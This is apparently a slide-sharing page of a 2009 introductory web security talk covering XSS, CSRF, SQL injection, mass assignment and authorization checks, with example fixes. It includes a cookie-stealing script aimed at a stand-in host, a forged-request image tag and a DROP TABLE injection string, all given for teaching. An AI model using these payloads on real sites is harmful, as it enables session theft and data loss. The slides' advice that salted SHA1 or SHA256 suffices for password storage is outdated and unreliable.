PHP Frameworks: I want to break free (IPC Berlin 2024)
 
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdfFIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
 
When stars align: studies in data quality, knowledge graphs, and machine lear...
When stars align: studies in data quality, knowledge graphs, and machine lear...When stars align: studies in data quality, knowledge graphs, and machine lear...
When stars align: studies in data quality, knowledge graphs, and machine lear...
 
The Art of the Pitch: WordPress Relationships and Sales
The Art of the Pitch: WordPress Relationships and SalesThe Art of the Pitch: WordPress Relationships and Sales
The Art of the Pitch: WordPress Relationships and Sales
 
Key Trends Shaping the Future of Infrastructure.pdf
Key Trends Shaping the Future of Infrastructure.pdfKey Trends Shaping the Future of Infrastructure.pdf
Key Trends Shaping the Future of Infrastructure.pdf
 
How world-class product teams are winning in the AI era by CEO and Founder, P...
How world-class product teams are winning in the AI era by CEO and Founder, P...How world-class product teams are winning in the AI era by CEO and Founder, P...
How world-class product teams are winning in the AI era by CEO and Founder, P...
 

2009 Barcamp Nashville Web Security 101

  • 2. Who is this guy? Brian Dailey realm3 web applications
  • 4. Even when you might think it's not.
  • 5. TRUST ME Security is all about trust.
  • 7. XSS The user believes you are this guy: But this guy is really watching:
  • 8. XSS: Methods Non-persistent: Entice user to load page (either by clicking a link or a hidden frame) and inject client-side script. Persistent: Save to the database and get users to load the page with the client-side script.
  • 9. XSS Give me back my session! <script> document.write('<img src=” http://my.hacker.com/ me.php?cookie=' + document.cookie + '” width=”1” height=”1” />'); </script>
  • 10. XSS Another example: Embed a form that captures a saved password, collect it. If you can inject Javascript or HTML, you can do all sorts of nefarious things.
  • 11.
  • 13. White listing HTML tags (black listing is tricky!)
  • 14. CSRF (Cross-site Request Forgery) Exploit server's trust of user.
  • 15. CSRF You think this is your user: But really it is:
  • 16. CSRF Example: <img src=” http://your.site.com/addtocart.php?item-id=12&ship_to=l33t_haxor ” height=”1” width=”1” /> Works especially well with GET requests, but using POST is not a surefire way to prevent this.
  • 17. CSRF Prevention Techniques Authorize each user action. Don't use GET when modifying data.
  • 19. SQL Injection String sql = “SELECT * FROM users WHERE name LIKE '%” + name + “'”; http://www.subgenius.com/person.jsp?name=foobar ”;+DROP+TABLE+USERS--
  • 20. SQL Injection Prevention This one is pretty easy: use parameterized statements. (You could also escape control characters, but there are issues with that.) String sql = &quot;SELECT * FROM users WHERE name LIKE ?&quot;; java.sql.PreparedStatement stmt = Conn.prepareStatement(sql); stmt.setString(1, request.getParameter(&quot;name&quot;));
  • 22. They can come with their own set of issues.
  • 24. Mass Assignment Rails Example: @user = User.find(current_user.id) @user.update_attributes(params[:user]) If I POST user[is_admin] = 1 W00t! I pwned u! Fix by using attr_accessible (in model) or by whitelisting. http://www.quarkruby.com/2007/9/20/ruby-on-rails-security-guide
  • 25. Mass Assignment Symfony: If you're using Forms, you're not vulnerable. (Kudos to Symfony.) CakePHP: # Anything about $this->data could be changed! # This makes me sad. $this->Post->save($this->data);
  • 27. Ownership Authorization Rails: # bad @post = Post.find(params[:id]) # good @post = current_user.posts.find(params[:id])
  • 28. Ownership Authorization CakePHP: // bad $post = $this->Post->findById($id); // good $post = $this->Post->find( array('conditions' => array( 'id' => $id, 'user_id' => $this->Auth->user('id'), ) );
  • 29. Ownership Authorization Symfony: // bad $post = Doctrine::getTable('Post')->find($id); // good $post = Doctrine_Query::create() ->select('*') ->from('Post p') ->where('p.id = ?', $id) ->where('p.user_id = ?', $user_id );
  • 30. Other Considerations > Rate limit user login attempts to prevent brute-force attacks. + Use caching (memcache) to track attempts. > Always apply hash to user passwords + Md5 is no good, use Sha1, Sha256 & Salt Useful Resources Potential Attacks Overview (OWASP has a ton of info!) http://www.owasp.org/index.php/Category:Attack Google Code University on Web Security http://code.google.com/edu/security/index.html Rails Security Guide http://www.quarkruby.com/2007/9/20/ruby-on-rails-security-guide
  • 31. Wrapping Things Up DO: Assume that users can be malicious. Assume that your data is important (it should be!) DON'T: Assume your framework handles all security concerns. Assume your application is “unbreakable.”
  • 32. Thanks! Any questions? Brian Dailey realm3 web applications Web: http://realm3.com/ Twitter: @brian_dailey Email: brian@realm3.com/ Phone: 917-512-3594 slide-bg: http://bit.ly/xc0m1 Kudos to: http://asi9.net/